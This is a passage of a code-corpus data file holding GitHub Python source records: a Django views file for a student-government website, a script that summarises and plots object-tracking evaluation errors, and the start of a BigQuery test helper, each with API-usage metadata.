posts)\n return render(request, 'blog.html', locals())\n\ndef login_user(request):\n if request.method == 'GET':\n if request.user.is_authenticated():\n return redirect('/edit_profile/')\n auth_form = ASGAuthForm()\n elif request.method == 'POST':\n auth_form = ASGAuthForm(request.POST)\n user = authenticate(username=request.POST['username'],\n password=request.POST['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n try:\n person = Person.objects.get(user=user)\n except Person.DoesNotExist:\n # This is a superuser\n return redirect('/admin/')\n return redirect(settings.LOGIN_REDIRECT_URL)\n else:\n login_error = 'Your account has been deactivated'\n else:\n login_error = 'Invalid username or password'\n return render(request, 'login.html', locals())\n\n@login_required\ndef edit_profile(request):\n 'A page for the logged-in user to edit his/her own profile'\n person = get_object_or_404(Person, user=request.user)\n if request.method == 'GET':\n person_form = PersonForm(instance=person)\n elif request.method == 'POST':\n # User submitted the form; update fields\n person_form = PersonForm(request.POST, request.FILES, instance=person)\n if person_form.is_valid():\n # Save the updated data\n person_form.save()\n update_success = True\n person_form = PersonForm(instance=person)\n return render(request, 'edit_profile.html', locals())\n\n\n# When a visitor selects a senator as \"My senator\"\ndef select_senator(request):\n if 'senator_id' in request.GET:\n request.session['my_senator'] = int(request.GET['senator_id'])\n elif 'clear' in request.GET:\n request.session.pop('my_senator', None)\n return redirect('/senators/#table')\n\n\n\n\n\n# For views limited to ASG exec members\ndef exec_required(view_fn):\n def _view_fn(*args, **kwargs):\n if args[0].user.groups.filter(name='Exec Board Members').count() > 0:\n return view_fn(*args, **kwargs)\n return redirect('/login/')\n return _view_fn\n\n@exec_required\ndef exec_tools(request):\n committees = Committee.objects.iterator()\n return render(request, 'exec_tools.html', locals())\n\n@exec_required\ndef export_roster(request):\n roster = StringIO.StringIO()\n call_command('output_roster', output_dest=roster)\n roster.seek(0) # rewind StringIO to beginning (like a file)\n response = StreamingHttpResponse(FileWrapper(roster), content_type='application/csv')\n response['Content-Disposition'] = 'attachment; filename=asg_roster.csv'\n return response\n\nclass ProjectsPDF(PDFTemplateView):\n template_name = 'pdf/projects.html'\n\n def get_context_data(self, **kwargs):\n return super(ProjectsPDF, self).get_context_data(\n pagesize='letter',\n title='ASG Projects summary',\n projects=Project.objects.filter(active=True).iterator(),\n today=timezone.now(),\n **kwargs\n )\n\nclass ResourcesPDF(PDFTemplateView):\n template_name = 'pdf/resources.html'\n\n def get_context_data(self, **kwargs):\n return super(ResourcesPDF, self).get_context_data(\n pagesize='letter',\n title='ASG Resources summary',\n resources=Resource.objects.filter(is_active=True).iterator(),\n today=timezone.now(),\n **kwargs\n )\n\n", "repo_name": "nuasg/asg.northwestern.edu", "sub_path": "asg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 71, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 86, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 96, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 106, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 110, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 116, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 121, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 132, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 138, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 150, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 159, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 160, "usage_type": "call"}, {"api_name": "django.conf.settings.LOGIN_REDIRECT_URL", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 165, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 170, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 181, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 167, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 201, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 207, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 211, "usage_type": "call"}, {"api_name": "django.core.management.call_command", "line_number": 212, "usage_type": "call"}, {"api_name": "django.http.StreamingHttpResponse", "line_number": 214, "usage_type": "call"}, {"api_name": "django.core.servers.basehttp.FileWrapper", "line_number": 214, "usage_type": "call"}, {"api_name": "easy_pdf.views.PDFTemplateView", "line_number": 218, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 226, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 226, "usage_type": "name"}, {"api_name": "easy_pdf.views.PDFTemplateView", "line_number": 230, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 238, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 238, "usage_type": "name"}]} +{"seq_id": "4657706703", "text": "import argparse\nimport json\nimport warnings\nfrom itertools import cycle\nfrom pathlib import Path\nfrom pprint import pprint\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport yaml\nfrom evaluate_trajectories import MOTMetrics\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef _plt_hist(df, dst_dir, save):\n print(\"Plotting histogram...\")\n plt.hist(df.error_offline, bins=60, stacked=True, log=True, density=True)\n _, ymax = plt.ylim()\n plt.title(\"Histogram of errors (60 bins)\")\n plt.axvline(\n df.error_offline.mean(),\n linestyle=\"dashed\",\n label=f\"Mean: {df.error_offline.mean():.2f}\",\n color=\"b\",\n )\n plt.axvline(\n df.error_offline.median(),\n linestyle=\"dotted\",\n label=f\"Median: {df.error_offline.median():.2f}\",\n color=\"r\",\n )\n plt.xlabel(\"Error\")\n plt.ylabel(\"Count\")\n plt.legend()\n if save:\n plt.savefig((dst_dir / \"histogram.pdf\").as_posix())\n plt.clf()\n else:\n plt.show()\n print(\"Done!\")\n\n\ndef _plt_hist_no_outliers(df, dst_dir, save):\n print(\"Plotting histogram w/o outliers...\")\n errs = df.where(df.error_offline < df.error_offline.std()).error_offline\n plt.hist(\n errs, bins=60, stacked=True, log=True, density=True,\n )\n _, ymax = plt.ylim()\n plt.title(\"Histogram of errors < stddev (60 bins)\")\n plt.axvline(\n errs.mean(), linestyle=\"dashed\", label=f\"Mean: {errs.mean():.2f}\", color=\"b\",\n )\n plt.axvline(\n errs.median(),\n linestyle=\"dotted\",\n label=f\"Median: {errs.median():.2f}\",\n color=\"r\",\n )\n plt.xlabel(\"Error\")\n plt.ylabel(\"Count\")\n plt.legend()\n if save:\n plt.savefig((dst_dir / \"histogram_no_outliers.pdf\").as_posix())\n plt.clf()\n else:\n plt.show()\n print(\"Done!\")\n\n\ndef _plt_error_by_dist(df, dst_dir, save):\n print(\"Plotting error_offline by distance...\")\n plt.title(\"Distance vs. Error\")\n markers = cycle(range(0, 11))\n colors = cycle(plt.cm.Spectral(np.linspace(0, 1, 100)).tolist())\n for scene in df.scene.unique():\n marker = next(markers)\n for obj in df[df.scene == scene].object_id.unique():\n obj_df = df.where(df.scene == scene).where(df.object_id == obj)\n plt.scatter(\n obj_df.error_offline,\n obj_df.distance,\n color=next(colors),\n marker=marker,\n label=f\"{scene}, {obj}\",\n )\n plt.xlabel(\"Error [m]\")\n plt.ylabel(\"Distance [m]\")\n # plt.legend(loc=\"upper right\")\n if save:\n plt.savefig((dst_dir / \"error_vs_dist.pdf\").as_posix())\n plt.clf()\n else:\n plt.show()\n print(\"Done\")\n\n\ndef _summarize_df_by_dist(df):\n dist_summary = {}\n df_close = df.loc[df.distance < 5]\n df_mid = df.loc[(df.distance >= 5) & (df.distance < 30)]\n df_far = df.loc[df.distance >= 30]\n dist_summary[\"close\"] = _get_metrics(df_close)\n dist_summary[\"mid\"] = _get_metrics(df_mid)\n dist_summary[\"far\"] = _get_metrics(df_far)\n return dist_summary\n\n\ndef _summarize_df(df):\n summary = {}\n summary[\"total\"] = _get_metrics(df)\n df_fully_visible = df.loc[(df.truncation_lvl == 0) & (df.occlusion_lvl == 0)]\n summary[\"fully-visible\"] = _get_metrics(df_fully_visible)\n obj_summary = {}\n df_ped = df.loc[df.obj_class == \"Pedestrian\"]\n df_car = df.loc[df.obj_class == \"Car\"]\n obj_summary[\"car\"] = _get_metrics(df_car)\n obj_summary[\"car\"].update(_summarize_per_obj(df_car))\n obj_summary[\"pedestrian\"] = _get_metrics(df_ped)\n obj_summary[\"pedestrian\"].update(_summarize_per_obj(df_ped))\n summary[\"obj-type\"] = obj_summary\n summary[\"distance\"] = _summarize_df_by_dist(df)\n summary[\"per-obj\"] = _summarize_per_obj(df, summarize_best_worst=True)\n return summary\n\n\ndef _summarize_best_worst(df, group, summarize_item):\n df_groupedby = df.groupby(group)\n mean_errors_offline = df_groupedby.error_offline.mean()\n median_errors_offline = df_groupedby.error_offline.median()\n mean_errors_online = df_groupedby.error_online.mean()\n median_errors_online = df_groupedby.error_online.median()\n summary = {}\n best = {}\n best_mean_offline = []\n best_mean_online = []\n for item in mean_errors_offline.nsmallest(n=3).items():\n best_mean_offline.append(summarize_item(df, item))\n for item in mean_errors_online.nsmallest(n=3).items():\n best_mean_online.append(summarize_item(df, item))\n best_median_offline = []\n best_median_online = []\n for item in median_errors_offline.nsmallest(n=3).items():\n best_median_offline.append(summarize_item(df, item))\n for item in median_errors_online.nsmallest(n=3).items():\n best_median_online.append(summarize_item(df, item))\n\n worst = {}\n worst_mean_offline = []\n worst_mean_online = []\n for item in mean_errors_offline.nlargest(n=3).items():\n worst_mean_offline.append(summarize_item(df, item))\n for item in mean_errors_online.nlargest(n=3).items():\n worst_mean_online.append(summarize_item(df, item))\n worst_median_offline = []\n worst_median_online = []\n for item in median_errors_offline.nlargest(n=3).items():\n worst_median_offline.append(summarize_item(df, item))\n for item in median_errors_online.nlargest(n=3).items():\n worst_median_online.append(summarize_item(df, item))\n\n best_offline = {}\n best_online = {}\n best_offline[\"median\"] = best_median_offline\n best_offline[\"mean\"] = best_mean_offline\n best_online[\"median\"] = best_median_online\n best_online[\"mean\"] = best_mean_online\n best[\"offline\"] = best_offline\n best[\"online\"] = best_online\n\n worst_offline = {}\n worst_online = {}\n worst_offline[\"median\"] = worst_median_offline\n worst_offline[\"mean\"] = worst_mean_offline\n worst_online[\"median\"] = worst_median_online\n worst_online[\"mean\"] = worst_mean_online\n worst[\"offline\"] = worst_offline\n worst[\"online\"] = worst_online\n summary[\"worst\"] = worst\n summary[\"best\"] = best\n return summary\n\n\ndef _summarize_per_obj(df, summarize_best_worst=False):\n obj_summary = {}\n df_groupedby_obj = df.groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"all\"] = _summarize_groupedby_obj(\n df_groupedby_obj, summarize_best_worst=summarize_best_worst\n )\n df_groupedby_obj_close = df.loc[\n df_groupedby_obj.distance.transform(\"mean\") < 5\n ].groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"close\"] = _summarize_groupedby_obj(df_groupedby_obj_close)\n df_groupedby_obj_mid = df.loc[\n df_groupedby_obj.distance.transform(\"mean\") < 30\n ].groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"mid\"] = _summarize_groupedby_obj(df_groupedby_obj_mid)\n df_groupedby_obj_far = df.loc[\n df_groupedby_obj.distance.transform(\"mean\") > 30\n ].groupby([\"scene\", \"object_id\", \"obj_class\"])\n obj_summary[\"far\"] = _summarize_groupedby_obj(df_groupedby_obj_far)\n # outliers: close: num_objects * median error_offline gt 1\n # mid: num_objects * median error_offline gt 5\n # far: num_objects * median error_offline gt 10\n # divided by num objects from all\n num_outliers_close_offline = (\n obj_summary[\"close\"][\"num-objs\"]\n - obj_summary[\"close\"][\"offline\"][\"median-error-lt-1\"]\n )\n num_outliers_mid_offline = (\n obj_summary[\"mid\"][\"num-objs\"]\n - obj_summary[\"mid\"][\"offline\"][\"median-error-lt-5\"]\n )\n num_outliers_far_offline = (\n obj_summary[\"far\"][\"num-objs\"]\n - obj_summary[\"far\"][\"offline\"][\"median-error-lt-10\"]\n )\n num_outliers_offline = (\n num_outliers_close_offline + num_outliers_mid_offline + num_outliers_far_offline\n )\n num_outliers_close_online = (\n obj_summary[\"close\"][\"num-objs\"]\n - obj_summary[\"close\"][\"online\"][\"median-error-lt-1\"]\n )\n num_outliers_mid_online = (\n obj_summary[\"mid\"][\"num-objs\"]\n - obj_summary[\"mid\"][\"online\"][\"median-error-lt-5\"]\n )\n num_outliers_far_online = (\n obj_summary[\"far\"][\"num-objs\"]\n - obj_summary[\"far\"][\"online\"][\"median-error-lt-10\"]\n )\n num_outliers_online = (\n num_outliers_close_online + num_outliers_mid_online + num_outliers_far_online\n )\n num_objs = obj_summary[\"all\"][\"num-objs\"]\n if num_objs:\n obj_summary[\"outlier-ratio\"] = {}\n obj_summary[\"outlier-ratio\"][\"offline\"] = min(\n num_outliers_offline / num_objs, 1\n )\n obj_summary[\"outlier-ratio\"][\"online\"] = min(num_outliers_online / num_objs, 1)\n else:\n obj_summary[\"outlier-ratio\"] = \"NA\"\n return obj_summary\n\n\ndef _summarize_groupedby_obj(df_groupedby_obj, summarize_best_worst=False):\n num_objs = len(df_groupedby_obj)\n mean_errors_offline = df_groupedby_obj.error_offline.mean()\n median_errors_offline = df_groupedby_obj.error_offline.median()\n mean_errors_online = df_groupedby_obj.error_online.mean()\n median_errors_online = df_groupedby_obj.error_online.median()\n obj_summary = {}\n obj_summary[\"num-objs\"] = num_objs\n offline_summary = {}\n offline_summary[\"mean-of-mean\"] = float(mean_errors_offline.mean())\n offline_summary[\"median-of-mean\"] = float(mean_errors_offline.median())\n offline_summary[\"mean-of-median\"] = float(median_errors_offline.mean())\n offline_summary[\"median-of-median\"] = float(median_errors_offline.median())\n offline_summary[\"mean-error-lt-10\"] = float((mean_errors_offline < 10).sum())\n offline_summary[\"mean-error-lt-5\"] = float((mean_errors_offline < 5).sum())\n offline_summary[\"mean-error-lt-3\"] = float((mean_errors_offline < 3).sum())\n offline_summary[\"mean-error-lt-1\"] = float((mean_errors_offline < 1).sum())\n offline_summary[\"median-error-lt-10\"] = float((median_errors_offline < 10).sum())\n offline_summary[\"median-error-lt-5\"] = float((median_errors_offline < 5).sum())\n offline_summary[\"median-error-lt-3\"] = float((median_errors_offline < 3).sum())\n offline_summary[\"median-error-lt-1\"] = float((median_errors_offline < 1).sum())\n obj_summary[\"offline\"] = offline_summary\n online_summary = {}\n online_summary[\"mean-of-mean\"] = float(mean_errors_online.mean())\n online_summary[\"median-of-mean\"] = float(mean_errors_online.median())\n online_summary[\"mean-of-median\"] = float(median_errors_online.mean())\n online_summary[\"median-of-median\"] = float(median_errors_online.median())\n online_summary[\"mean-error-lt-10\"] = float((mean_errors_online < 10).sum())\n online_summary[\"mean-error-lt-5\"] = float((mean_errors_online < 5).sum())\n online_summary[\"mean-error-lt-3\"] = float((mean_errors_online < 3).sum())\n online_summary[\"mean-error-lt-1\"] = float((mean_errors_online < 1).sum())\n online_summary[\"median-error-lt-10\"] = float((median_errors_online < 10).sum())\n online_summary[\"median-error-lt-5\"] = float((median_errors_online < 5).sum())\n online_summary[\"median-error-lt-3\"] = float((median_errors_online < 3).sum())\n online_summary[\"median-error-lt-1\"] = float((median_errors_online < 1).sum())\n obj_summary[\"online\"] = online_summary\n\n if summarize_best_worst:\n best_worst = _summarize_best_worst(\n df,\n group=[\"scene\", \"object_id\", \"obj_class\"],\n summarize_item=_get_obj_summary,\n )\n obj_summary.update(best_worst)\n return obj_summary\n\n\ndef _get_scene_summary(df, scene_row):\n scene, error_offline = scene_row\n df_scene = df[df.scene == scene]\n num_frames_total = len(df_scene)\n num_objects = len(df_scene.object_id.unique())\n max_error_offline = float(df_scene.error_offline.max())\n min_error_offline = float(df_scene.error_offline.min())\n max_error_online = float(df_scene.error_online.max())\n min_error_online = float(df_scene.error_online.min())\n return {\n \"scene\": scene,\n \"error_offline\": error_offline,\n \"num_frames\": num_frames_total,\n \"num_objects\": num_objects,\n \"max_error_offline\": max_error_offline,\n \"min_error_offline\": min_error_offline,\n \"max_error_online\": max_error_online,\n \"min_error_online\": min_error_online,\n }\n\n\ndef _get_obj_summary(df, obj):\n scene, obj_id, obj_class = obj[0]\n error_offline = obj[1]\n df_obj = df.loc[(df.scene == scene) & (df.object_id == obj_id)]\n num_frames_total = len(df_obj)\n try:\n tracked_ratio = float(df_obj.tracked.sum() / num_frames_total)\n except AttributeError:\n tracked_ratio = \"NA\"\n df_fully_visible = df_obj.loc[(df.truncation_lvl == 0) & (df.occlusion_lvl == 0)]\n fully_visible_ratio = len(df_fully_visible) / num_frames_total\n min_dist_from_cam = float(df_obj.distance.min())\n max_dist_from_cam = float(df_obj.distance.max())\n return {\n \"scene\": scene,\n \"object_id\": obj_id,\n \"class\": obj_class,\n \"error_offline\": error_offline,\n \"num_frames\": num_frames_total,\n \"tracked_ratio\": tracked_ratio,\n \"fully_visible_ratio\": fully_visible_ratio,\n \"min_dist\": min_dist_from_cam,\n \"max_dist\": max_dist_from_cam,\n }\n\n\ndef _get_metrics(df):\n metrics = {}\n errors_offline = {}\n errors_offline[\"mean\"] = float(df.error_offline.mean())\n errors_offline[\"median\"] = float(df.error_offline.median())\n errors_offline[\"stddev\"] = float(df.error_offline.std())\n errors_online = {}\n errors_online[\"mean\"] = float(df.error_online.mean())\n errors_online[\"median\"] = float(df.error_online.median())\n errors_online[\"stddev\"] = float(df.error_online.std())\n metrics[\"offline\"] = errors_offline\n metrics[\"online\"] = errors_online\n if df.empty:\n metrics[\"tracked_ratio\"] = \"NA\"\n else:\n try:\n metrics[\"tracked_ratio\"] = float(df.tracked.sum() / len(df))\n except AttributeError:\n metrics[\"tracked_ratio\"] = \"NA\"\n return metrics\n\n\ndef _create_report(df, dst_dir, save):\n if save:\n csv_dir = dst_dir / \"csv\"\n csv_dir.mkdir(exist_ok=True)\n df.to_csv((csv_dir / \"full.csv\").as_posix())\n report = {}\n print(\"Creating overall summary...\")\n report[\"summary\"] = _summarize_df(df)\n print(\"Created!\")\n per_scene_report = {}\n report[\"per-scene\"] = _summarize_best_worst(\n df, group=[\"scene\"], summarize_item=_get_scene_summary\n )\n for scene in sorted(df.scene.unique()):\n print(f\"Creating summary for scene {scene}\")\n scene_df = df[df.scene == scene]\n per_scene_report[scene] = _summarize_df(scene_df)\n print(\"Created!\")\n report[\"per-scene\"].update(per_scene_report)\n\n if save:\n print(\"Saving report\")\n with open(dst_dir / \"report.yaml\", \"w\") as fp:\n yaml.dump(report, fp, sort_keys=False)\n else:\n pprint(report)\n print(\"Finished report!\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\n \"input\",\n help=\"The evaluation directory containing an `evaluation.csv` file for all scenes\",\n )\n parser.add_argument(\n \"-s\", \"--save\", dest=\"save\", action=\"store_true\", help=\"Whether to save plots\"\n )\n\n args = parser.parse_args()\n src_dir = Path(args.input)\n df = None\n full_mot_metrics = MOTMetrics()\n for scene_dir in src_dir.iterdir():\n if scene_dir.is_file():\n continue\n eval_file = scene_dir / \"evaluation.csv\"\n if not eval_file.exists():\n continue\n mot_metrics_file = scene_dir / \"mot_metrics.json\"\n with open(mot_metrics_file, \"r\") as fp:\n scene_mot_metrics = MOTMetrics(**json.load(fp))\n full_mot_metrics.mostly_lost += scene_mot_metrics.mostly_lost\n full_mot_metrics.mostly_tracked += scene_mot_metrics.mostly_tracked\n full_mot_metrics.partly_tracked += scene_mot_metrics.partly_tracked\n full_mot_metrics.true_positives += scene_mot_metrics.true_positives\n full_mot_metrics.false_positives += scene_mot_metrics.false_positives\n full_mot_metrics.false_negatives += scene_mot_metrics.false_negatives\n\n scene_df = pd.read_csv(eval_file.as_posix())\n # for backward compatibility\n scene_df.rename(\n columns={\n \"occlusion level\": \"occlusion_lvl\",\n \"truncation level\": \"truncation_lvl\",\n \"object id\": \"object_id\",\n \"image id\": \"image_id\",\n \"distance from camera\": \"distance\",\n },\n inplace=True,\n )\n\n scene_df.insert(0, \"scene\", scene_dir.name)\n if df is None:\n df = scene_df\n else:\n df = pd.concat([df, scene_df], ignore_index=True)\n dst_dir = src_dir / \"full_eval\"\n dst_dir.mkdir(exist_ok=True)\n # PLOTS\n # histogram of errors\n _create_report(df, dst_dir, args.save)\n _plt_hist(df, dst_dir, args.save)\n _plt_hist_no_outliers(df, dst_dir, args.save)\n full_mot_metrics.precision = full_mot_metrics.true_positives / (\n full_mot_metrics.true_positives + full_mot_metrics.false_positives\n )\n full_mot_metrics.recall = full_mot_metrics.true_positives / (\n full_mot_metrics.true_positives + full_mot_metrics.false_negatives\n )\n full_mot_metrics.f1 = (2 * full_mot_metrics.precision * full_mot_metrics.recall) / (\n full_mot_metrics.precision + full_mot_metrics.recall\n )\n full_mot_metrics_fname = dst_dir / \"mot_metrics.json\"\n with open(full_mot_metrics_fname, \"w\") as fp:\n json.dump(full_mot_metrics.__dict__, fp, indent=4)\n # _plt_error_by_dist(df, dst_dir, args.save)\n # histogram of errors w/o outliers\n # errors vs distance\n", "repo_name": "AnselmC/bamot", "sub_path": "scripts/full_evaluation.py", "file_name": "full_evaluation.py", "file_ext": "py", "file_size_in_byte": 17724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "itertools.cycle", "line_number": 76, "usage_type": "call"}, {"api_name": "itertools.cycle", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm.Spectral", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 77, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "yaml.dump", "line_number": 389, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 391, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 396, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 406, "usage_type": "call"}, {"api_name": "evaluate_trajectories.MOTMetrics", "line_number": 408, "usage_type": "call"}, {"api_name": "evaluate_trajectories.MOTMetrics", "line_number": 417, "usage_type": "call"}, {"api_name": "json.load", "line_number": 417, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 425, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 442, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 461, "usage_type": "call"}]} +{"seq_id": "24499735812", "text": "from google.cloud import bigquery, exceptions\nfrom tests.utils import constants\n\n\ndef get_dataset():\n return constants.bq_client.get_dataset(constants.dataset_id)\n\n\ndef dataset_exists():\n try:\n get_dataset()\n return True\n except exceptions.NotFound:\n return False\n\n\ndef delete_dataset():\n constants.bq_client.delete_dataset(\n constants.dataset_id,\n delete_contents=True,\n not_found_ok=True)\n\n\ndef create_dataset():\n dataset = bigquery.Dataset(constants.dataset_id)\n dataset.location = constants.dataset_location\n 